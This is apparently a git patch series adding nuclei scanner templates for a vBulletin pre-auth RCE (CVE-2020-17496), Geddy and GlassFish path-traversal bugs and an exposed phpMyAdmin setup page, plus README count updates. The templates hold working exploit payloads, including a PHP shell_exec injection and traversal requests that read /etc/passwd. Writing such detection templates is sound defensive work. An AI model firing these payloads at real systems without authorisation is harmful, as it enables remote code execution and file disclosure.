From 0f765c8824928a09714489c2929ce1818165ae7c Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 01:30:52 +0530 Subject: [PATCH 01/20] Create CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 cves/2020/CVE-2020-17496.yaml diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml new file mode 100644 index 0000000000..7fecc0fdfa --- /dev/null +++ b/cves/2020/CVE-2020-17496.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-17496 +info: + name: vBulletin Pre-Auth RCE + author: pussycat0x, kettelabs + severity: high + reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed + tags: cve,cve2020,vbulletin +requests: + -method: POST + path: + -"{{BaseURL}}ajax/render/widget_tabbedcontainer_tab_panel" + body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + matchers-condition: and + matchers: + -type: regex + regex: + -"root:[x*]:0:0" + -type: status + status: + -200 From ae38390e09b323786ecfd14b88605a90c82f34c3 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 01:48:54 +0530 Subject: [PATCH 02/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 7fecc0fdfa..32ffe74967 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -8,7 +8,7 @@ info: requests: -method: POST path: - -"{{BaseURL}}ajax/render/widget_tabbedcontainer_tab_panel" + -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: From f91b3ad0c2b9c554f025517c04173a82248b5b68 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:11:02 +0530 Subject: [PATCH 03/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 32ffe74967..44d22bab63 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -17,4 +17,4 @@ requests: -"root:[x*]:0:0" -type: status status: - -200 + -200 From 3f5cf52a1cd205d255b6ba6e98b16c66f9c39631 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:12:51 +0530 Subject: [PATCH 04/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 44d22bab63..ede3c59e15 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -1,7 +1,7 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x, kettelabs + author: pussycat0x,kettelabs severity: high reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin @@ -9,7 +9,7 @@ requests: -method: POST path: -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: -type: regex From 40f751fa4d71cdd3a55d738e1ccfda57cd1fded6 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:18:48 +0530 Subject: [PATCH 05/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index ede3c59e15..c0480e234b 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -9,7 +9,8 @@ requests: -method: POST path: -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body:subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + body: | + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; matchers-condition: and matchers: -type: regex From 73c5f9e8cd271853a548ef7bd5e068c4b76eae84 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:24:26 +0530 Subject: [PATCH 06/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index c0480e234b..7893678a57 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -6,11 +6,13 @@ info: reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin requests: - -method: POST - path: - -"{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: | - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Host: {{Hostname}} + + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; + matchers-condition: and matchers: -type: regex From c0922ec5d15afaf978a1a5a1c4bc56972b6bfa6a Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:34:40 +0000 Subject: [PATCH 07/20] Create CVE-2015-5688.yaml --- cves/2015/CVE-2015-5688.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 cves/2015/CVE-2015-5688.yaml diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml new file mode 100644 index 0000000000..ab95c85cac --- /dev/null +++ b/cves/2015/CVE-2015-5688.yaml @@ -0,0 +1,24 @@ +id: CVE-2015-5688 + +info: + name: Geddy before v13.0.8 LFI + author: pikpikcu + severity: high + issues: https://github.com/geddy/geddy/issues/697 + reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688 + tags: geddy,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + part: body + + - type: status + status: + - 200 From c9cf6b3198134cb282816829cae361a79508ae37 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 25 Feb 2021 02:35:55 +0000 Subject: [PATCH 08/20] update tags --- cves/2015/CVE-2015-5688.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index ab95c85cac..3e20097031 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -6,7 +6,7 @@ info: severity: high issues: https://github.com/geddy/geddy/issues/697 reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688 - tags: geddy,lfi + tags: cve,cve2015,geddy,lfi requests: - method: GET From 7b45997a1c21d0482b8d0ebd2f2bc3889dccccf7 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 12:04:10 +0530 Subject: [PATCH 09/20] Update CVE-2017-1000028.yaml --- cves/2017/CVE-2017-1000028.yaml | 38 ++++++++++++++++----------------- 1 file changed, 18 insertions(+), 20 deletions(-) diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index cc906fc2b6..a879ee5732 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -1,23 +1,21 @@ -id: CVE-2017-1000028 - +id: CVE-2020-17496 info: - name: GlassFish LFI - author: pikpikcu - severity: high - reference: https://www.exploit-db.com/exploits/45196 - tags: cve,cve2017,oracle,glassfish,lfi - + name: vBulletin Pre-Auth RCE + author: pussycat0x + severity: high + reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed + tags: cve,cve2020,vbulletin requests: - - method: GET - path: - - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" - matchers-condition: and - matchers: - - type: word - words: - - "/sbin/nologin" - part: body - + - method: POST + path: + - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + +matchers-condition: and +matchers: + - type: regex + regex: + - "root:[x*]:0:0" - type: status - status: - - 200 +status: + -200 From 247245c8375ac21bb595c1be3c1a7022e0e14570 Mon Sep 17 00:00:00 2001 From: pussycat0x <65701233+pussycat0x@users.noreply.github.com> Date: Thu, 25 Feb 2021 12:25:34 +0530 Subject: [PATCH 10/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 30 ++++++++++++++---------------- 1 file changed, 14 insertions(+), 16 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 7893678a57..37585aa104 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -1,23 +1,21 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x,kettelabs + author: pussycat0x severity: high reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed tags: cve,cve2020,vbulletin requests: - - raw: - - | - POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 - Host: {{Hostname}} - - subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit; - - matchers-condition: and - matchers: - -type: regex - regex: - -"root:[x*]:0:0" - -type: status - status: - -200 + - method: POST + path: + - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + - type: status + status: + -200 From 02fffe3c635467d418f6df3524dc784887a9cc49 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:06:06 +0530 Subject: [PATCH 11/20] Update CVE-2015-5688.yaml --- cves/2015/CVE-2015-5688.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index 3e20097031..0835a41425 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -11,7 +11,8 @@ info: requests: - method: GET path: - - "{{BaseURL}}:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd" + matchers-condition: and matchers: - type: regex From 88fcfacecdb6e76882583f12da4d419c4f5a5391 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 08:37:20 +0000 Subject: [PATCH 12/20] Auto Update README [Thu Feb 25 08:37:20 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index f35e301e7c..ab79b71125 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 204 | vulnerabilities | 96 | exposed-panels | 74 | +| cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 12 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 597 files**. +**61 directories, 598 files**. From f3d73944a33b6a8b5b3063ad3253f4cfa5dc47ea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:24:57 +0530 Subject: [PATCH 13/20] Added phpmyadmin-setup --- miscellaneous/phpmyadmin-setup.yaml | 29 +++++++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 miscellaneous/phpmyadmin-setup.yaml diff --git a/miscellaneous/phpmyadmin-setup.yaml b/miscellaneous/phpmyadmin-setup.yaml new file mode 100644 index 0000000000..68d64e30f0 --- /dev/null +++ b/miscellaneous/phpmyadmin-setup.yaml @@ -0,0 +1,29 @@ +id: phpmyadmin-setup + +info: + name: Publicly Accessible Phpmyadmin Setup + author: sheikhrishad + severity: medium + + +requests: + - method: GET + path: + - "{{BaseURL}}/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/_phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/forum/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/php/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/typo3/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/web/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/xampp/phpmyadmin/scripts/setup.php" + - "{{BaseURL}}/sysadmin/phpMyAdmin/scripts/setup.php" + + matchers-condition: and + matchers: + - type: word + words: + - "You want to configure phpMyAdmin using web interface" + + - type: status + status: + - 200 \ No newline at end of file From d623e95e2f174589de3e4ed449e3fc4200983685 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 08:55:29 +0000 Subject: [PATCH 14/20] Auto Update README [Thu Feb 25 08:55:29 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index ab79b71125..e396143a21 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | -| workflows | 21 | miscellaneous | 12 | default-logins | 10 | +| workflows | 21 | miscellaneous | 13 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 598 files**. +**61 directories, 599 files**. From fc11a30eb7c1c6e2eda519608afd78bfcaca1ef4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:34:22 +0530 Subject: [PATCH 15/20] misc changes --- cves/2020/CVE-2020-17496.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 37585aa104..a9e48e2b1e 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -1,16 +1,18 @@ id: CVE-2020-17496 info: name: vBulletin Pre-Auth RCE - author: pussycat0x - severity: high + author: pussycat0x + severity: critical reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - tags: cve,cve2020,vbulletin + tags: cve,cve2020,vbulletin,rce + requests: - method: POST path: - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" - + + body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + matchers-condition: and matchers: - type: regex @@ -18,4 +20,4 @@ requests: - "root:[x*]:0:0" - type: status status: - -200 + -200 From 275ca9dbba8f5f942b72891fd4734eded6e24ea7 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:37:22 +0530 Subject: [PATCH 16/20] updating overwrite --- cves/2017/CVE-2017-1000028.yaml | 38 +++++++++++++++++---------------- 1 file changed, 20 insertions(+), 18 deletions(-) diff --git a/cves/2017/CVE-2017-1000028.yaml b/cves/2017/CVE-2017-1000028.yaml index a879ee5732..dd2b8b5604 100644 --- a/cves/2017/CVE-2017-1000028.yaml +++ b/cves/2017/CVE-2017-1000028.yaml @@ -1,21 +1,23 @@ -id: CVE-2020-17496 +id: CVE-2017-1000028 + info: - name: vBulletin Pre-Auth RCE - author: pussycat0x - severity: high - reference: https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed - tags: cve,cve2020,vbulletin + name: GlassFish LFI + author: pikpikcu + severity: high + reference: https://www.exploit-db.com/exploits/45196 + tags: cve,cve2017,oracle,glassfish,lfi + requests: - - method: POST - path: - - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" - -matchers-condition: and -matchers: - - type: regex - regex: - - "root:[x*]:0:0" + - method: GET + path: + - "{{BaseURL}}/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd" + matchers-condition: and + matchers: + - type: word + words: + - "/sbin/nologin" + part: body + - type: status -status: - -200 + status: + - 200 \ No newline at end of file From 3d0b0f996e913539b9cf00051d286fc25b54803a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:40:01 +0530 Subject: [PATCH 17/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index a9e48e2b1e..091c725823 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -17,7 +17,7 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0" + - "root:[x*]:0:0" - type: status status: - -200 + - 200 From 99e7f93500134c105b7c69d355478ee29e702078 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 14:43:06 +0530 Subject: [PATCH 18/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 091c725823..60a263b098 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -15,9 +15,10 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 \ No newline at end of file From 707a4de8650ab9fb65a8401f1291fc61b589b351 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+bauthard@users.noreply.github.com> Date: Thu, 25 Feb 2021 15:01:40 +0530 Subject: [PATCH 19/20] Update CVE-2020-17496.yaml --- cves/2020/CVE-2020-17496.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2020/CVE-2020-17496.yaml b/cves/2020/CVE-2020-17496.yaml index 60a263b098..e5eab40390 100644 --- a/cves/2020/CVE-2020-17496.yaml +++ b/cves/2020/CVE-2020-17496.yaml @@ -7,11 +7,12 @@ info: tags: cve,cve2020,vbulletin,rce requests: - - method: POST - path: - - "{{BaseURL}}/ajax/render/widget_tabbedcontainer_tab_panel" + - raw: + - | + POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1 + Content-Type: application/x-www-form-urlencoded - body: "subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" + subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" matchers-condition: and matchers: From c9a23276ea8139a4be7b806e51e9bffc8a138f25 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 25 Feb 2021 09:33:07 +0000 Subject: [PATCH 20/20] Auto Update README [Thu Feb 25 09:33:07 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e396143a21..b98fc89840 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 205 | vulnerabilities | 96 | exposed-panels | 74 | +| cves | 206 | vulnerabilities | 96 | exposed-panels | 74 | | exposures | 55 | technologies | 46 | misconfiguration | 48 | | workflows | 21 | miscellaneous | 13 | default-logins | 10 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**61 directories, 599 files**. +**61 directories, 600 files**.